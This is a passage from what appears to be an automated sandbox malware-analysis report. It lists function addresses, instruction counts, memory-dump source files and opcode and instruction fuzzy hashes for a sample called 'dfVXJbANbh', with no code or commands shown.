                      • Opcode Fuzzy Hash: c6c99604511c59c07b5ae14093426f464af54ff2820725c7ed80b39afcc60f03
                      • Instruction Fuzzy Hash: 3431DE30A1868E8FEB95EB64C4A86FE77E0FF4A300F01457AC10AD319ADE786144A741
                      Function 00007FFD344B66E0 Relevance: .1, Instructions: 103COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b30d08ef4f4e89163e67de390c3f05fb51ad4354e86cbbe88fd2b2546061c11
                      • Instruction ID: 5b3c991e4f12468735b9c159a9319a8306689563e5ad690aa36da6766a04e955
                      • Opcode Fuzzy Hash: 7b30d08ef4f4e89163e67de390c3f05fb51ad4354e86cbbe88fd2b2546061c11
                      • Instruction Fuzzy Hash: 0B31C230A086498FDB95EF3488A96B97BE1FF1A300F0145BED949C70A6DEB9A444C741
                      Function 00007FFD344B0938 Relevance: .1, Instructions: 103COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 754de0097ca671040981192e9ffe482b00c145769f98f903cedf683b2d46579a
                      • Instruction ID: 232ae14b848324dc7b03ce6409bbbc495aa1cb49ed25e4a7b44b9f2e370fdcc9
                      • Opcode Fuzzy Hash: 754de0097ca671040981192e9ffe482b00c145769f98f903cedf683b2d46579a
                      • Instruction Fuzzy Hash: C341F730E1850A8FEB90EBA8C4A4AEDB7F1FF19301F110579D109E7295DEB8A944DB40
                      Function 00007FFD344A3FC0 Relevance: .1, Instructions: 102COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d10160796da7cf0bce396cf2d149fa660df17e8031b73cd6d0fb7024dadc46a
                      • Instruction ID: 5942bd7ac4393d7f34381d94301d025ab8e19281fba212547703120b589fbc7b
                      • Opcode Fuzzy Hash: 5d10160796da7cf0bce396cf2d149fa660df17e8031b73cd6d0fb7024dadc46a
                      • Instruction Fuzzy Hash: 1E316330A1D6898FD792AB7488A85AD7FF0EF1A300F0605F7D519CB0A7EA39A544D711
                      Function 00007FFD344991B9 Relevance: .1, Instructions: 100COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e24a5d30d0c6f53d35bd4c9f62677c31b0f6738b79b28e68dd8a08a0ed8f870
                      • Instruction ID: ea58bf8c0a770aaa30236e29308a82f8ce618bc9a8be795ea535cc196fc1cce1
                      • Opcode Fuzzy Hash: 3e24a5d30d0c6f53d35bd4c9f62677c31b0f6738b79b28e68dd8a08a0ed8f870
                      • Instruction Fuzzy Hash: 6E31E731A0D64E4FEB599F24C8652FE7BB0FF16300F0501BAE509D62C2CB78A854EB91
                      Function 00007FFD344A3D26 Relevance: .1, Instructions: 99COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a6b35cc5a841f0ab89d2bcee8d8a46d15a33628624c9f9e5c8d16debc47f7e1
                      • Instruction ID: 6a0393bbecce6209c0b50423c59e225dde43455f67d4f050c19b7717f672a36c
                      • Opcode Fuzzy Hash: 2a6b35cc5a841f0ab89d2bcee8d8a46d15a33628624c9f9e5c8d16debc47f7e1
                      • Instruction Fuzzy Hash: D7319E30A0A68A8FDB91DF64C8606EA7BF0EF46310F0501BAD944D7282EB7C9945DB51
                      Function 00007FFD344AD4B1 Relevance: .1, Instructions: 98COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5805719313a1e196841a01a68507af54ccbe2c201acae8b9ddb051780117b6e9
                      • Instruction ID: 8b737960a7cea09655e6aaa28215eafc1603cf289dae467b1c662990f1a96b51
                      • Opcode Fuzzy Hash: 5805719313a1e196841a01a68507af54ccbe2c201acae8b9ddb051780117b6e9
                      • Instruction Fuzzy Hash: 7721057170AA094FD7C5DF6CD4D567273E2FF9A31871542B6D80CCB29ACA29E842C781
                      Function 00007FFD344836BA Relevance: .1, Instructions: 96COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cc829b5461566bab04b6f240b9b80ead4c566786696531963a3338f01b96ef70
                      • Instruction ID: ef547f1aaab792ea3c84b9998bb3eca74b6bce74daa8a8d1ab16346c0a1ce612
                      • Opcode Fuzzy Hash: cc829b5461566bab04b6f240b9b80ead4c566786696531963a3338f01b96ef70
                      • Instruction Fuzzy Hash: 3231ACB1A0990E8EE794DF98D8A83A97BE1EB96315F50027AC00DD72D6DFF614418B40
                      Function 00007FFD34499120 Relevance: .1, Instructions: 95COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 407c30567d271802c92e030065a114ab79e74678586bcb7efaaf28466a7256d2
                      • Instruction ID: 444d8c1a80f3acf9dbc93b5a5aa2794eb8cc25dfa9675347840a06d7366900a5
                      • Opcode Fuzzy Hash: 407c30567d271802c92e030065a114ab79e74678586bcb7efaaf28466a7256d2
                      • Instruction Fuzzy Hash: 9E313C32B485455FE705AFB894BB2ED37E0EF03315B0400BBC609DB197DE286445DB80
                      Function 00007FFD34492E86 Relevance: .1, Instructions: 94COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5e7f4eb1b20d72eee0d0d382e81324ac5290eb51cf9a8c93d8bf2630f1daa98b
                      • Instruction ID: 62f58a1d4be4e4fb934d03aecd0f375e8c50a637249f31b4730f2d1e5c9e5207
                      • Opcode Fuzzy Hash: 5e7f4eb1b20d72eee0d0d382e81324ac5290eb51cf9a8c93d8bf2630f1daa98b
                      • Instruction Fuzzy Hash: 72411870E1951D8EDBA0EB94C8A5BEDB7B0FF59304F1081BAD00DE3286DE7829859F40
                      Function 00007FFD344AD098 Relevance: .1, Instructions: 93COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bdc1b011e0537bfd93700479b6b0ed87397cd761424798fd44045b3d55b40ac1
                      • Instruction ID: 7b4606cdcb5fd21d0c412137e079c207868e9542389cc42b2f9106670b600ccb
                      • Opcode Fuzzy Hash: bdc1b011e0537bfd93700479b6b0ed87397cd761424798fd44045b3d55b40ac1
                      • Instruction Fuzzy Hash: 3A210A20B0EA8A4FE7D5E72884A47617BE2FF92314B1541FAD089C71ABDD6DE8428741
                      Function 00007FFD34495128 Relevance: .1, Instructions: 88COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 62aa2ad0cf9601eafaac2e4fc766d26173d944924f667200bbd1877ee5f994fd
                      • Instruction ID: 281ebaed3d8aad19e66d9e08884ff6c5023d5601fcd49a371f8117eefcee72d4
                      • Opcode Fuzzy Hash: 62aa2ad0cf9601eafaac2e4fc766d26173d944924f667200bbd1877ee5f994fd
                      • Instruction Fuzzy Hash: 7C312C32E0E6894BEB98DF2484661F97BD0FF16305F1500BED94CC2182DA7DA554E741
                      Function 00007FFD3448328C Relevance: .1, Instructions: 84COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a93d228c22bb6a37b81e3410e6e2e9daf89933c8567e4625634a4d6f44fb83d7
                      • Instruction ID: 934262feab7755ece99941ba99ce8e1271729c99a50329020afbf74dd2b8e527
                      • Opcode Fuzzy Hash: a93d228c22bb6a37b81e3410e6e2e9daf89933c8567e4625634a4d6f44fb83d7
                      • Instruction Fuzzy Hash: B231D171E085198FEB94EF98D4A5AECBBF1FF59301F11403AD109E7296DA7A6880DB04
                      Function 00007FFD344A2988 Relevance: .1, Instructions: 83COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0395ecf5ba7ba6912fe10ff9fa8d2f9fcd0714a8d28e1a4acef9158c4069f25
                      • Instruction ID: 545675e2daab7a4f28208a4a9e6fa35b91604f7a66f4f20cd566e6486a4b2129
                      • Opcode Fuzzy Hash: d0395ecf5ba7ba6912fe10ff9fa8d2f9fcd0714a8d28e1a4acef9158c4069f25
                      • Instruction Fuzzy Hash: 10319F30E1A68E8FEB95EB6488A43FA7BF4FF06310F0105BAD609D3196DA786544DB41
                      Function 00007FFD3449D2D8 Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2eb1a00412bb5aaedfb8601e146094fd46731d616179afbc69b8a359aa51a7c6
                      • Instruction ID: 1660980d58d9aa7130653525fbad6bda6201184edb871611c29531b9de365b49
                      • Opcode Fuzzy Hash: 2eb1a00412bb5aaedfb8601e146094fd46731d616179afbc69b8a359aa51a7c6
                      • Instruction Fuzzy Hash: 4221BF70A0C68E8BEB649F24C8646FE37E0FF56301F01057AD919D3185DFBC6504A741
                      Function 00007FFD3449AF20 Relevance: .1, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0ee0705fab974e42195d9be8c33f7c2f98a3f3825a0c5cba4d4da25559462a2
                      • Instruction ID: 78032f4fefaa6ad102de8e3108053dc6e095d6145d906cf7ed32789034116017
                      • Opcode Fuzzy Hash: c0ee0705fab974e42195d9be8c33f7c2f98a3f3825a0c5cba4d4da25559462a2
                      • Instruction Fuzzy Hash: BE21AC70A0868E8BEB64AF20C8646FE37A4FF46301F01067AD519D3295EFBCA558A741
                      Function 00007FFD34483348 Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 35b1ba14d86917026dda36181f7fa09833c23738729405da0baaf71848a251ed
                      • Instruction ID: 8050f157ac33f03f2c4e7a0b8f77b67877157fb2ce0994a11b97fa0c5adf0102
                      • Opcode Fuzzy Hash: 35b1ba14d86917026dda36181f7fa09833c23738729405da0baaf71848a251ed
                      • Instruction Fuzzy Hash: FD21AE3094D68A9FE782EB7488685EA3FF4EF07310F0505F6D048C70A2EA7D9546C751
                      Function 00007FFD344A2860 Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a142ff4dde5097d37f4a812b70bbf743cfbf23dbeda4ce8a960c0a47388a514b
                      • Instruction ID: e7aa98603a9392b1ea45e4e9d22be45fe53a3571cb4fa3e400a69060c797fe3f
                      • Opcode Fuzzy Hash: a142ff4dde5097d37f4a812b70bbf743cfbf23dbeda4ce8a960c0a47388a514b
                      • Instruction Fuzzy Hash: B5213970E0960A8FEB90EF64C4957BE76F1EB06300F11013AD609E7288FBB8A5449B90
                      Function 00007FFD344AB160 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f6578c617a6253349535079530c042d2fbf7ed1df4d7ebc832e0d574a665440a
                      • Instruction ID: ba03c42b5647bfa97c906e7448d1e05465395635c28f123b732380133660d308
                      • Opcode Fuzzy Hash: f6578c617a6253349535079530c042d2fbf7ed1df4d7ebc832e0d574a665440a
                      • Instruction Fuzzy Hash: 07119171B19D0B4FEBE4EA1C90A4766B3D2FFA5308B10457AD04DC3289DD69E8424780
                      Function 00007FFD34481F19 Relevance: .1, Instructions: 65COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 444f56807710c26299fc1edd0a10f38e60081ea367956346dbb26282e76816cb
                      • Instruction ID: 03e91db0b876f5788e1df7f320d6f32fa15cd37a394ccc40d798c9c3066c4252
                      • Opcode Fuzzy Hash: 444f56807710c26299fc1edd0a10f38e60081ea367956346dbb26282e76816cb
                      • Instruction Fuzzy Hash: F0118241A4E2C25FEBA3577808B54666FD44F03224B2E45FFE2D8CA0E7DA4E4849D313
                      Function 00007FFD34482350 Relevance: .1, Instructions: 63COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a67cfa4184c7819658360193025396e10f33dd28dc6249c17822d8f351dbd4c3
                      • Instruction ID: af2b4071d506b505894c9457cd11a68ad5561ad58bf9787f16938adba0b6a5cf
                      • Opcode Fuzzy Hash: a67cfa4184c7819658360193025396e10f33dd28dc6249c17822d8f351dbd4c3
                      • Instruction Fuzzy Hash: BD114F30E595198EEB94EB14C8A1BFCB2B4FF46300F421179D10EE3186CEBD2985EA40
                      Function 00007FFD3449EE02 Relevance: .1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d09a2a1d2299f181a5bd353dc7c5a494b080e0d83dab9d958159cbbfb7f1098b
                      • Instruction ID: 6f2ad1f54bca67fb9695023f19619ebb804fc3170f9ab4ed01d7a4e3432c7bb4
                      • Opcode Fuzzy Hash: d09a2a1d2299f181a5bd353dc7c5a494b080e0d83dab9d958159cbbfb7f1098b
                      • Instruction Fuzzy Hash: 5921C970A1861A8BDB59EF98C8A5BEDB7B1FF59300F1141B9D10DE7395CA786940DF00
                      Function 00007FFD34482DE1 Relevance: .1, Instructions: 51COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fdd179f752bec4b6054b6369f87216d9074a63fd249bc978e6ec8ee612a0c9cb
                      • Instruction ID: b30522e38bbeb375a6ade6966dc749070fbe23c9c06c1d9a08b41d0dbbb88384
                      • Opcode Fuzzy Hash: fdd179f752bec4b6054b6369f87216d9074a63fd249bc978e6ec8ee612a0c9cb
                      • Instruction Fuzzy Hash: 2C01AD30E1860E8FE781EB64C4A85BA77E4FF1A300F0255B6E50CC60A6EF39E0408740
                      Function 00007FFD344805D8 Relevance: .0, Instructions: 50COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ebac6f2202786fded6484f766611c3645d1c0ddec58ede0a77685edd32bd468e
                      • Instruction ID: 6c737d3c75925b87e47521e2b5f0b2252be9849c0ca71eb72f906949793d5588
                      • Opcode Fuzzy Hash: ebac6f2202786fded6484f766611c3645d1c0ddec58ede0a77685edd32bd468e
                      • Instruction Fuzzy Hash: 2A019E30E0850E8FEB88EF24C0A56BA77A1FF69305F11047ED40ED3194CA7AA550CB40
                      Function 00007FFD3448348A Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7adedf0d4240ccf08ecde8cfdc658beff6d38b2f6700caf7a87f77f20cee767
                      • Instruction ID: 5382594299980972aa15e4868ba199e1fcbb9306abcebb50e5de1bfb3657c991
                      • Opcode Fuzzy Hash: b7adedf0d4240ccf08ecde8cfdc658beff6d38b2f6700caf7a87f77f20cee767
                      • Instruction Fuzzy Hash: F4014030E1854E8BDB99EFA4C4A91BE7BE4FF19300F1005BED51ED2195EA7AA5409740
                      Function 00007FFD344A4028 Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3605ee3ef97c1a5c46cefe3eeab2025416e92cfc2df34eefae9f61a0fe1a442c
                      • Instruction ID: b9be092e9847bdad16326f335389feefd5f3c40547d4b11551099cb8ca1a75d0
                      • Opcode Fuzzy Hash: 3605ee3ef97c1a5c46cefe3eeab2025416e92cfc2df34eefae9f61a0fe1a442c
                      • Instruction Fuzzy Hash: 4B014C2190E3DA8FE7939B7448681BD3FB0EF17300F0905FBC658CA097EA6D9549A712
                      Function 00007FFD34482E59 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71d6658d1d4a4512c9e15b2e1ee9d3a778c99498286c37296882d403c766d85f
                      • Instruction ID: 3487cd4aac4b9f167ed886dd63e2fc9c43a5d40b6697f55bbf5a3cef6e8696f9
                      • Opcode Fuzzy Hash: 71d6658d1d4a4512c9e15b2e1ee9d3a778c99498286c37296882d403c766d85f
                      • Instruction Fuzzy Hash: 16018430A4D6499FE792E774C8A95B93BE0FF16300F0605F2D509D6096DE7DA4449701
                      Function 00007FFD344827BD Relevance: .0, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 30d7cd45421f545fcc216b4a4ebb87ef84e15bb4ea5e52fbbc10408c05c87574
                      • Instruction ID: a90cddd2ae0fe4b84a09812375739142b1e048b478e7409433c4a7dca5b86eb7
                      • Opcode Fuzzy Hash: 30d7cd45421f545fcc216b4a4ebb87ef84e15bb4ea5e52fbbc10408c05c87574
                      • Instruction Fuzzy Hash: 8A01A730E1DA4D8FE791EF64C4991B97BE0FF1A300F0245B7D508C7096EA79E4509711
                      Function 00007FFD344AF11E Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cda8d0eb9d7595ce32508421f0464574094bf877fed7f37cd90a5a287cf66a3c
                      • Instruction ID: ef6637682d7d624edde850fd6a75da0e5108eae80c847df02147eb473c8b937a
                      • Opcode Fuzzy Hash: cda8d0eb9d7595ce32508421f0464574094bf877fed7f37cd90a5a287cf66a3c
                      • Instruction Fuzzy Hash: 0F01C970E096198BDB98DF84C8A47ECB3B1FF56301F41457DD00AE7699CBB81985EB10
                      Function 00007FFD344A28F8 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4029989aa85af0a636657ea9d5ae56e00d9d9ed3395028c25f2d60e56261ab0e
                      • Instruction ID: 5b4470cdb2a7d58963c1d0cb68678e3c1767433b54e0baaba6a3c3739229f9c8
                      • Opcode Fuzzy Hash: 4029989aa85af0a636657ea9d5ae56e00d9d9ed3395028c25f2d60e56261ab0e
                      • Instruction Fuzzy Hash: 5901712090E3CA8FD793577048681BD3FB0AF17304F0505F7C558CA097EA2D6548E712
                      Function 00007FFD34480610 Relevance: .0, Instructions: 42COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 376d2244e0c5fdda89a721eb74e0c44ff6975ab857ec9741222409ce27d79e84
                      • Instruction ID: 3e62576bd9af1dc3d44afefc6da7b34b5cc769c2be0d08fb3c4d5924ed28b233
                      • Opcode Fuzzy Hash: 376d2244e0c5fdda89a721eb74e0c44ff6975ab857ec9741222409ce27d79e84
                      • Instruction Fuzzy Hash: 00018130A1850E9BEB98EF64C4A82B977E4FF19305F51087EE41ED21D5DE7AA550D600
                      Function 00007FFD34480608 Relevance: .0, Instructions: 42COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6fabf5dc0691e8cb84aa6080d94cc8af4b6952f34dd879b4f29d43d0edad25a
                      • Instruction ID: e4981e204072ead1a8c046804621890bdba3aed3907be12007570d2718afbf15
                      • Opcode Fuzzy Hash: c6fabf5dc0691e8cb84aa6080d94cc8af4b6952f34dd879b4f29d43d0edad25a
                      • Instruction Fuzzy Hash: 26018C30A1850E8BEB9CEF64C4A82BA73A4FF19305F51087EE41ED21D5DE7AA550D600
                      Function 00007FFD344A3157 Relevance: .0, Instructions: 42COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 102e8ec3eab551c57be956b1e3be05e8f22143cb7e83731d0ba6bcef8ad50fba
                      • Instruction ID: 61eb9aa1f11a92f4df6d74331330b05cdc99a7a2bc876ebdac0572c8a4ad759f
                      • Opcode Fuzzy Hash: 102e8ec3eab551c57be956b1e3be05e8f22143cb7e83731d0ba6bcef8ad50fba
                      • Instruction Fuzzy Hash: BF01D670E09A0D8FDF84EBA8C499AACB7F1FF69341F114039E00DE3255EA78A841DB41
                      Function 00007FFD344822D4 Relevance: .0, Instructions: 41COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9c7e6192d034e7a454ca8996136de085f8954ea25679882ff87fbb858a73d294
